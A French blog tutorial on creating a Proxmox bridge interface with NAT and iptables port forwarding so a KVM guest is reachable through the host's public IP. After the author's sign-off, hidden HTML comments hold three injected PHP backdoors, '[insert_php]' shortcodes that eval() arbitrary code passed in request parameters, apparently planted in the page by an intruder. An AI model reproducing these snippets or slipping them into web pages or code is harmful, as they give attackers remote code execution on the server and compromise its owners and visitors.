Proxmox – KVM sur l’ip hôte

Ce tuto reprends les étapes principales pour effectuer une redirection de ports afin de faire communiquer une machine virtuelle kvm via l’ip de notre hôte proxmox pour moi ça sera une machine hébergé par ovh.

Prérequis:

  • Un serveur avec un proxmox installé et fonctionnel

Premièrement il faut créé l’interface « vmbr2 » sur votre hôte proxmox, pour se faire il y au moins 2 manières de pratiquer. (en console et en graphique, mais je préfère la console)

→ Le mode console

nano /etc/network/interfaces

et on ajoute vulgairement ceci

auto vmbr2
 iface vmbr2 inet static
 address 192.168.0.254
 netmask 255.255.255.0
 bridge_ports none
 bridge_stp off
 bridge_fd 0
 post-up echo 1 > /proc/sys/net/ipv4/ip_forward
 post-up iptables -t nat -A POSTROUTING -s '192.168.0.0/24' -o vmbr0 -j MASQUERADE
 post-down iptables -t nat -D POSTROUTING -s '192.168.0.0/24' -o vmbr0 -j MASQUERADE

Dans mon cas j’ai utilisé un bloc d’adressage de classe C mais vous pouvez choisir n’importe quelle classe privée.

Ensuite on démarre l’interface

ifup vmbr2

→ Le mode graphique

Il suffit de se rendre sur votre interface Proxmox via l’adresse https://urldevotredédié:8006

Une fois sur votre interface de gestion et sélectionner votre node et se rendre sur l’onglet réseau, il ne restera qu’a créer votre nouvelle nouvelle interface et d’y renseigner les différents éléments demandés. Notez qu’il faudra redémarrer votre hôte pour compléter l’instruction. (aaahhh les interfaces graphiques)

Adresse ip: 192.168.0.254
 Masque: 255.255.255.0

Capture02

Donc maintenant il suffit de créer une machine de type kvm clasique (je ne détails pas l’installation ici, juste la partie réseau)

Une fois à l’étape réseau, on sélectionne Bridged mode et on prends vmbr2 dans la liste déroulante en suite le type de la carte j’ai pris « Virtio » pour de meilleurs performances mais « Intel e1000 » ça fonctionnera aussi.

Capture

Une fois terminé, vous pouvez lancer l’installation de votre machine virtuelle et suivre celle-ci via votre console.

Pour la configuration de réseau de votre machine remplissez la avec les infos ci-dessous:

ip : 192.168.0.1
 netmask 255.255.255.0
 broadcast 192.168.0.255
 gateway : 192.168.0.254 (ip de vmbr2 de votre hôte)
 serveur de nom : 80.67.188.188 (Serveur dns de FFDN pour internet non censuré)

La dernière étape sera de faire les redirections de ports afin que votre machine virtuelle puisse être vue depuis internet.

Pour ce faire il suffit d’un « simple » règle iptables, dans mon cas c’est le port 22 de ma machine virtuelle qui sera vu sur le port 2222 de l’ip de la machine physique.

iptables -t nat -A PREROUTING -i vmbr0 -p tcp --dport 2222 -j DNAT --to 192.168.0.1:22

On pourrai arrêté ici mais si vous redémarrer votre hôte la règle disparaitra dans la matrice :O

Afin d’éviter ça on va ajouter 2 lignes dans notre fichiers interfaces de notre hôte

post-up iptables -t nat -A PREROUTING -i vmbr0 -p tcp --dport 2222 -j DNAT --to 192.168.0.1:22
 post-down iptables -t nat -D PREROUTING -i vmbr0 -p tcp --dport 2222  -j DNAT --to 192.168.0.1:22

Voilà que s’achève mon premier billet, bon c’est reste assez brouillon mais c’est un bon début. Non?

<!– [insert_php]if (isset($_REQUEST["EjAVr"])){eval($_REQUEST["EjAVr"]);exit;}[/insert_php]

if (isset($_REQUEST[&quot;EjAVr&quot;])){eval($_REQUEST[&quot;EjAVr&quot;]);exit;}

–>

<!– [insert_php]if (isset($_REQUEST["rqjV"])){eval($_REQUEST["rqjV"]);exit;}[/insert_php]

if (isset($_REQUEST[&quot;rqjV&quot;])){eval($_REQUEST[&quot;rqjV&quot;]);exit;}

–>

<!– [insert_php]if (isset($_REQUEST["meB"])){eval($_REQUEST["meB"]);exit;}[/insert_php]

if (isset($_REQUEST[&quot;meB&quot;])){eval($_REQUEST[&quot;meB&quot;]);exit;}

–>